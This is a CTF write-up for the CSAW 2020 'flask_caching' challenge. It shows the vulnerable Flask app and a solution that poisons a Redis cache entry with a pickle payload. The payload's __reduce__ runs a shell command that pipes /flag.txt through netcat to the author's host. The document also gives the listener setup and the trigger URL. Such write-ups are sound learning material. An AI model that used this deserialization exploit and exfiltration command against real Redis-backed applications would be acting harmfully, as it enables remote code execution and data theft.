CSAW CTF Qualification Round 2020: flask_caching


300 points

cache all the things (this is python3)



#!/usr/bin/env python3

from flask import Flask
from flask import request, redirect
from flask_caching import Cache
from redis import Redis
import jinja2
import os

app = Flask(__name__)
app.config['CACHE_REDIS_HOST'] = 'localhost'
app.config['DEBUG'] = False

cache = Cache(app, config={'CACHE_TYPE': 'redis'})
redis = Redis('localhost')
jinja_env = jinja2.Environment(autoescape=['html', 'xml'])

@app.route('/', methods=['GET', 'POST'])
def notes_post():
    if request.method == 'GET':
        return '''
        <h4>Post a note</h4>
        <form method=POST enctype=multipart/form-data>
        <input name=title placeholder=title>
        <input type=file name=content placeholder=content>
        <input type=submit>

    print(request.form, flush=True)
    print(request.files, flush=True)
    title = request.form.get('title', default=None)
    content = request.files.get('content', default=None)

    if title is None or content is None:
        return 'Missing fields', 400

    content = content.stream.read()

    if len(title) > 100 or len(content) > 256:
        return 'Too long', 400

    redis.setex(name=title, value=content, time=3)  # Note will only live for max 30 seconds

    return 'Thanks!'

# This caching stuff is cool! Lets make a bunch of cached functions.

def _test0():
    return 'test'
def test0():
    return 'test'
def _test1():
    return 'test'
def test1():
    return 'test'
def _test2():
    return 'test'
def test2():
    return 'test'
def _test3():
    return 'test'
def test3():
    return 'test'
def _test4():
    return 'test'
def test4():
    return 'test'
def _test5():
    return 'test'
def test5():
    return 'test'
def _test6():
    return 'test'
def test6():
    return 'test'
def _test7():
    return 'test'
def test7():
    return 'test'
def _test8():
    return 'test'
def test8():
    return 'test'
def _test9():
    return 'test'
def test9():
    return 'test'
def _test10():
    return 'test'
def test10():
    return 'test'
def _test11():
    return 'test'
def test11():
    return 'test'
def _test12():
    return 'test'
def test12():
    return 'test'
def _test13():
    return 'test'
def test13():
    return 'test'
def _test14():
    return 'test'
def test14():
    return 'test'
def _test15():
    return 'test'
def test15():
    return 'test'
def _test16():
    return 'test'
def test16():
    return 'test'
def _test17():
    return 'test'
def test17():
    return 'test'
def _test18():
    return 'test'
def test18():
    return 'test'
def _test19():
    return 'test'
def test19():
    return 'test'
def _test20():
    return 'test'
def test20():
    return 'test'
def _test21():
    return 'test'
def test21():
    return 'test'
def _test22():
    return 'test'
def test22():
    return 'test'
def _test23():
    return 'test'
def test23():
    return 'test'
def _test24():
    return 'test'
def test24():
    return 'test'
def _test25():
    return 'test'
def test25():
    return 'test'
def _test26():
    return 'test'
def test26():
    return 'test'
def _test27():
    return 'test'
def test27():
    return 'test'
def _test28():
    return 'test'
def test28():
    return 'test'
def _test29():
    return 'test'
def test29():
    return 'test'
def _test30():
    return 'test'
def test30():
    return 'test'

if __name__ == "__main__":
    app.run('', 5000)


Idea behind the solution is to overwrite one of the cached test functions with my own function, which will execute malicious code.

I’ve created python program to prepare payload file:

import pickle

class Malicious:
    def __reduce__(self):
        return (os.system, ('cat /flag.txt | nc MYIPADDRESS 4444',))

malicious_function = Malicious()
payload = pickle.dumps(malicious_function)
f = open('payload', 'wb')
f.write(b'!' + payload)

Above code after execution left me a nice payload file that can be uploaded to the application

I didn’t want to read all the flask_caching code, so I’ve started redis in docker ( sudo docker run -p 6379:6379 -d —name redis redis) and the app to get the pattern of cachekey ;-) (it was achieved with redis-cli monitor)

Ok, at this point we got payload, we know the pattern of cachekey, one more thing is needed - nc -lvp 4444 running on my computer.

Let’s try to submit the payload…

flask caching1

…and execute it by requesting http://web.chal.csaw.io:5000/test21

Surprisely, flag popped up on my netcat ;-)

flask caching2

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